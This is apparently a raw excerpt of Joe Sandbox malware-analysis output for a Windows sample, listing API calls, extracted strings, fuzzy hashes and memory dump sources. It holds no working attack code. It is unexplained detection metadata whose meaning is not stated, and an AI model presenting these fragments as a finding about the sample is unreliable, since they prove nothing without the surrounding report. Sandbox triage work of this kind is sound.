                                    • Opcode ID: 6b8af2f7d41ace0938ac6111b27c7ae5033fe5e557b453fc299883dcafd81c98
                                    • Instruction ID: 258a3a24a74d5ca720b132a37286ab072f744ce88ece4732c9048563cf8272e2
                                    • Opcode Fuzzy Hash: 6b8af2f7d41ace0938ac6111b27c7ae5033fe5e557b453fc299883dcafd81c98
                                    • Instruction Fuzzy Hash: C6112132A04224ABDB279B24DD86BAE3798FF00720B058059F8066F282CB35BE4197D1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: X7
                                    • API String ID: 269201875-1737092782
                                    • Opcode ID: 670d1b7e653f8644133398de48a319e1325acfebd94ed19d969899016fae76fb
                                    • Instruction ID: d69990ee55d0259e32b0ef38a2f790f928822008e1047021889efc8f0fa6fcc6
                                    • Opcode Fuzzy Hash: 670d1b7e653f8644133398de48a319e1325acfebd94ed19d969899016fae76fb
                                    • Instruction Fuzzy Hash: BD11C875A002119BEB239B38AC41B56379DA756730F158B27F522CF1D8E7B0C8424B80
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0035F25E
                                    • ___raise_securityfailure.LIBCMT ref: 0035F345
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                    • String ID: 8:
                                    • API String ID: 3761405300-2795227845
                                    • Opcode ID: 8e5727778cd98c4634fd08fa1906799a00012946f3793be3068fa995412ffbea
                                    • Instruction ID: 09a769d61991df488c492c13f7fd7e15f8d6e471118c2ec2a1325052130bb85d
                                    • Opcode Fuzzy Hash: 8e5727778cd98c4634fd08fa1906799a00012946f3793be3068fa995412ffbea
                                    • Instruction Fuzzy Hash: BC21F5B9510704DBD72ADF64F981F507BE8BB5A310F10582AE9098B3B0E3B26984EF45
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00010000,003509D0,?,00000000,00000000), ref: 003508AD
                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 003508F4
                                      • Part of subcall function 00346E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00346EAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                    • String ID: CreateThread failed
                                    • API String ID: 2655393344-3849766595
                                    • Opcode ID: 9aaf88edd0433f989b5f5967a1939bc82bc74ba4e54dd975bedc8ac46e177446
                                    • Instruction ID: fcb742993c8dba7cfc2ac5b5072cfb1244e1d4fea8ca2189aa0041cb6bf6ccb8
                                    • Opcode Fuzzy Hash: 9aaf88edd0433f989b5f5967a1939bc82bc74ba4e54dd975bedc8ac46e177446
                                    • Instruction Fuzzy Hash: 33012BB52403056FD23A6F50EC42FA673D8EF00712F10042DFA8696090CEA278489760
                                    APIs
                                      • Part of subcall function 00368FA5: GetLastError.KERNEL32(?,00380EE8,00363E14,00380EE8,?,?,00363713,00000050,?,00380EE8,00000200), ref: 00368FA9
                                      • Part of subcall function 00368FA5: _free.LIBCMT ref: 00368FDC
                                      • Part of subcall function 00368FA5: SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 0036901D
                                      • Part of subcall function 00368FA5: _abort.LIBCMT ref: 00369023
                                    • _abort.LIBCMT ref: 0036B2E0
                                    • _free.LIBCMT ref: 0036B314
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLast_abort_free
                                    • String ID: 7
                                    • API String ID: 289325740-2922071456
                                    • Opcode ID: 470ffefa990823d85d1a28a276e43fc8ab4e32a7c58b4672c9fb6c0d3b3847d2
                                    • Instruction ID: 778cc58eccfce6b6511b8bc966d45b5a0d75e5a7e51106ae820645d482892072
                                    • Opcode Fuzzy Hash: 470ffefa990823d85d1a28a276e43fc8ab4e32a7c58b4672c9fb6c0d3b3847d2
                                    • Instruction Fuzzy Hash: 00016536D016219FC7339F59480165DF7A4BB08B21F1A8549E964AB755CB306D81CFC5
                                    APIs
                                      • Part of subcall function 0034DA98: _swprintf.LIBCMT ref: 0034DABE
                                      • Part of subcall function 0034DA98: _strlen.LIBCMT ref: 0034DADF
                                      • Part of subcall function 0034DA98: SetDlgItemTextW.USER32(?,0037E154,?), ref: 0034DB3F
                                      • Part of subcall function 0034DA98: GetWindowRect.USER32(?,?), ref: 0034DB79
                                      • Part of subcall function 0034DA98: GetClientRect.USER32(?,?), ref: 0034DB85
                                    • GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                    • SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                    • String ID: 0
                                    • API String ID: 2622349952-4108050209
                                    • Opcode ID: 493c86f5b6e10df23860ca1422fb0166dee928ad691e701b0160016947bf2825
                                    • Instruction ID: 2fac33d2a8ef4a17b8939aabed27547d581b970707a8cf7923f21c1e5e1a2a3b
                                    • Opcode Fuzzy Hash: 493c86f5b6e10df23860ca1422fb0166dee928ad691e701b0160016947bf2825
                                    • Instruction Fuzzy Hash: 8EF0873A10074CAADF2B1F608809BEA3BD8BF21305F098454FD5A589A1C778E9D5AF10
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00350A78,?), ref: 00350854
                                    • GetLastError.KERNEL32(?), ref: 00350860
                                      • Part of subcall function 00346E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00346EAF
                                    Strings
                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00350869
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                    • API String ID: 1091760877-2248577382
                                    • Opcode ID: 75d5fb4c42cdf18b910bb8a1a2715ae7074071232ad5f6d30e8aefac0c58d491
                                    • Instruction ID: 770479445485eb5575d86e4eb678ec726ab020369c693e2a1f3548325ea6ac66
                                    • Opcode Fuzzy Hash: 75d5fb4c42cdf18b910bb8a1a2715ae7074071232ad5f6d30e8aefac0c58d491
                                    • Instruction Fuzzy Hash: A8D02E3190803062CA233B24AC0AEEF79489F02330F204B14F23E6E1F1DB22199482D2
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,0034D32F,?), ref: 0034DA53
                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0034D32F,?), ref: 0034DA61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FindHandleModuleResource
                                    • String ID: RTL
                                    • API String ID: 3537982541-834975271
                                    • Opcode ID: 33b22773149a668a159348df656fe3728c1320ca1b336913a54615fff9bdeef6
                                    • Instruction ID: b62a4243eb34a8001111a1b13817ae2e8350f75069da80d7ee6b4f15043c44c8
                                    • Opcode Fuzzy Hash: 33b22773149a668a159348df656fe3728c1320ca1b336913a54615fff9bdeef6
                                    • Instruction Fuzzy Hash: C1C0123128535076D73217206C0DBC3698CAB11B11F05044DF24ADA1D0D6E5D980A651
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "9f$r6f$r6f$r6f$r6f$N_H
                                    • API String ID: 0-1092036463
                                    • Opcode ID: d143c28d5120f58b1d43dcb013ff5f8d8bdb83ac253164cdfe32ecebda49cacd
                                    • Instruction ID: 8ca50b7b2e7344c1ae017eb3f4bb834a3de0b48ae717a5305b67b012b8b9c990
                                    • Opcode Fuzzy Hash: d143c28d5120f58b1d43dcb013ff5f8d8bdb83ac253164cdfe32ecebda49cacd
                                    • Instruction Fuzzy Hash: AD616971E5894E8FEB98DBA8C8567AD7BF1FF59380F5400B9C00DC72D6DA686841CB42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0Wp
                                    • API String ID: 0-545783698
                                    • Opcode ID: 4a618bb7155c9aa9b053c0fe2687ca72e46ea8726e44298bd3224393594762b5
                                    • Instruction ID: abe4c5a1d0d083bc10a7d821ba9d329a471706df0f4c3c0ff78f18a251acfb70
                                    • Opcode Fuzzy Hash: 4a618bb7155c9aa9b053c0fe2687ca72e46ea8726e44298bd3224393594762b5
                                    • Instruction Fuzzy Hash: 2641D531A4D68A4FE796977884562BD7BF0FF86350B0545BAE44CC71D7EE2CA881C342
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: 66077448b23ebb77d4ee4706d977b28ac59e7c32161b3b1decbad997a2ac7a17
                                    • Instruction ID: faa4ab311853b05ffe669f23daaf6913b28372b41c78ea2959cb7fba739d0c70
                                    • Opcode Fuzzy Hash: 66077448b23ebb77d4ee4706d977b28ac59e7c32161b3b1decbad997a2ac7a17
                                    • Instruction Fuzzy Hash: 7A318C71A19A0E8FE748DFA8D8153ED7BF1EB95391F9001BAC00DD76C6CBB818558B81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1cf8e0abe93ed18b725e391a57996b9468c95cff6e638955b0fa387a15759c2c
                                    • Instruction ID: 5aa6e29aaa3ff61357ba313a7e6a54d9fb4e8228ccfda77e7e20c259e020e415
                                    • Opcode Fuzzy Hash: 1cf8e0abe93ed18b725e391a57996b9468c95cff6e638955b0fa387a15759c2c
                                    • Instruction Fuzzy Hash: DD718E32A58A498FDB48DE1CD8566BD7BE2FF98744F15417AD45EC32C2DE34A802C781
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b0b7a6e7fcd8394cb1e4187aad9b2887cd2f4a6a773397d6df6c1fc9d092c0ca
                                    • Instruction ID: 67a6bba767a6a060187250c497d495e8b816e3c38a290812b915ed8169ac9241
                                    • Opcode Fuzzy Hash: b0b7a6e7fcd8394cb1e4187aad9b2887cd2f4a6a773397d6df6c1fc9d092c0ca
                                    • Instruction Fuzzy Hash: F551C231A58A498FDB48DE1CC8556BA77E2FF98740B15467ED44EC7286CE34E802CB81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d2284ddb5ca5094f1b5c2fa8a74b603145392f7ecc126c4d4fa516a17bbb42c
                                    • Instruction ID: 5ec92f4cd36519b7c0fdf40d4cfc30c3eb21ef34aef033a45899218d09ebd711
                                    • Opcode Fuzzy Hash: 0d2284ddb5ca5094f1b5c2fa8a74b603145392f7ecc126c4d4fa516a17bbb42c
                                    • Instruction Fuzzy Hash: 01511475D4861ECFEB58EBA8C4566ECBBB1FF58351F50007AD009E72D2DA78A984CB40
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65aeaa94ab8e74266001706f4725ed9c27d92b1257ff8aecb2e9d96b89aec15f
                                    • Instruction ID: a5d72b6873bfa0bdff0da5971cceaeecf8e6f60b81b43bd2012e83fe1a771d41
                                    • Opcode Fuzzy Hash: 65aeaa94ab8e74266001706f4725ed9c27d92b1257ff8aecb2e9d96b89aec15f
                                    • Instruction Fuzzy Hash: D5216874A4854E8FEB55EB68C85A6BD7BF0FF18340F4008BAD41DCB192EA38A584C741
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 19b5f85dc872f7683830321245f0f180947fc422363c4e2e5171d2cda70152dc
                                    • Instruction ID: eff93574b83bcaba04eeb87144db5aa15d7a1bf718eec407ed99ecbb0460571e
                                    • Opcode Fuzzy Hash: 19b5f85dc872f7683830321245f0f180947fc422363c4e2e5171d2cda70152dc
                                    • Instruction Fuzzy Hash: 09115E70D5854E9FE780EB68848A2FE7BF0FF58350F4445B6C428C61A2EE38A444C751
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7caba7d99fe9d24d713e4693a314dfa701f8c8ea7810b4b2243062419f418f1
                                    • Instruction ID: 67d33bbe16d8736e092224b203a07248da40f37748d2d2828628d1245ed70717
                                    • Opcode Fuzzy Hash: d7caba7d99fe9d24d713e4693a314dfa701f8c8ea7810b4b2243062419f418f1
                                    • Instruction Fuzzy Hash: 12112630D985298EEB68EB10C862BFDBB74FF55340F0001BAC01EA21D2DE786984CF40
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d529a59c2ea1189279da4b211f0c18876736706366305d055182217d773a0e9f
                                    • Instruction ID: c788882bfdf3fd5d0b5e13c2227beff3f33c499ab56dfcff53faf66257a9660e
                                    • Opcode Fuzzy Hash: d529a59c2ea1189279da4b211f0c18876736706366305d055182217d773a0e9f
                                    • Instruction Fuzzy Hash: D011DD70D4864A8EEB99AB68C45A3FE7FF0FF59350F0504BEE01ACA0D2EA396544C701
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 55354841fcf94f2a39b7861f77cf633a7bdce625f8c7fd176a7ccb5746a5008b
                                    • Instruction ID: 1feee620bb71b588ab92b02ea452f6539612a29cfd58c31a8ed6154a2bdc1967
                                    • Opcode Fuzzy Hash: 55354841fcf94f2a39b7861f77cf633a7bdce625f8c7fd176a7ccb5746a5008b
                                    • Instruction Fuzzy Hash: 58114231E4890E8FEB54EB54C896BEE77B1FB98340F204675C01AD72D6CE386985CB81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cb1e0999d5c506aa6b1c905d6ea96a8366d77561a35e9f9f24c109fbfa03b4a
                                    • Instruction ID: 7f0b8def83a5e59df909e09530bb74c647663d668a557f3db23de00caebb16ab
                                    • Opcode Fuzzy Hash: 7cb1e0999d5c506aa6b1c905d6ea96a8366d77561a35e9f9f24c109fbfa03b4a
                                    • Instruction Fuzzy Hash: 7C017C3199864A8FE751EB24884A6FD7FF0FF19340F0549B6D408CA0E6EA38A494C601
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1831749974392bfe9103929cec3251f3a526ea7d46e1684034fd16ccf4c3fb16
                                    • Instruction ID: 813579ae7ed20211e27a4cec01d8004cd47fadba644a88a0bca5e493c3cc840f
                                    • Opcode Fuzzy Hash: 1831749974392bfe9103929cec3251f3a526ea7d46e1684034fd16ccf4c3fb16
                                    • Instruction Fuzzy Hash: 5E018C3094950E8FEB48EF64C0566BD7BB1FF59344F61087AD40EC61D2CB35A590CB40
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ce1a0469e13d8abdc7750c4bea51e949b766615cd09f8a438caa5a6af3424c5
                                    • Instruction ID: 380508698fd4315579060c1979de2bf7f13bc0458404bd5ee7f5f556f0923f4c
                                    • Opcode Fuzzy Hash: 1ce1a0469e13d8abdc7750c4bea51e949b766615cd09f8a438caa5a6af3424c5
                                    • Instruction Fuzzy Hash: 4B015A3198864D8FE751AB64848A6FD7BF1FF19350F4545B6E408C60E2EA38A584C741
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c97c872ee06d567992439c6b1a804d9681754c022f05c8c6e276737b6b35f9e1
                                    • Instruction ID: 9469b4a6964cc503c8e5d5d7bb5cde72722332757c2f36f1ce1c7df8f44e5682
                                    • Opcode Fuzzy Hash: c97c872ee06d567992439c6b1a804d9681754c022f05c8c6e276737b6b35f9e1
                                    • Instruction Fuzzy Hash: 24012874D5890E9EEB91EFA8C84D2BE7AF0FF18341F0049B6D41DC7092EA78A184CB41
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76977bad5c4fcc60c1f3ddf9d0fff9f5ea4110bc681ed104a9a2917c670937ac
                                    • Instruction ID: 941a2e84990434ff8376c21d420f162f4fe3428f45ff27621e29fd2404cc56c0
                                    • Opcode Fuzzy Hash: 76977bad5c4fcc60c1f3ddf9d0fff9f5ea4110bc681ed104a9a2917c670937ac
                                    • Instruction Fuzzy Hash: 7201713198D6894FE751AB24885A5ED7FF0FF5A350F0508B6D408CB0E7EA2CA594C701
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f45d60cd26176fd9014d8611d88b2e6cecdcbccd58bb3357a6e05edf71f635ad
                                    • Instruction ID: 79c0597d0b936f1678fc49315fcb6fb647060312c3d77c79960529bc3e43ab88
                                    • Opcode Fuzzy Hash: f45d60cd26176fd9014d8611d88b2e6cecdcbccd58bb3357a6e05edf71f635ad
                                    • Instruction Fuzzy Hash: 4C01813095850DCAEB58EB64C45A2BD77B0FF18346F50087ED41EC61D2DF39A590C701
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 74f82f57d425e24384f685b654c6c37c11c94db77b8526e74f8df784e3537881
                                    • Instruction ID: 35ff8f54978f596dccfc979ffe8a62107a64a6d5d834f2e8d3070a255481f4c4
                                    • Opcode Fuzzy Hash: 74f82f57d425e24384f685b654c6c37c11c94db77b8526e74f8df784e3537881
                                    • Instruction Fuzzy Hash: B4016D3095850E8FEB59EB64C4492BD76B0FF18346F50087ED41EC61D2DF39A594C741
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 780a31b39b63f10395516ecb39693d7cf7cb597f3a828e8978dddf0fece6980b
                                    • Instruction ID: fdcb3d50ec4879c45cad503908b3e47730fd95ff292bddd86d2d2483fe5a632e
                                    • Opcode Fuzzy Hash: 780a31b39b63f10395516ecb39693d7cf7cb597f3a828e8978dddf0fece6980b
                                    • Instruction Fuzzy Hash: 3F01AD7094A68D8FDB589F24C4662FD3FB1FF15300F5604BAD408C61D2DB399990CB40
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b6d842f2f12ac8d3f6589e0b6a5fb59edf34f493558c945e250f11f9614156cc
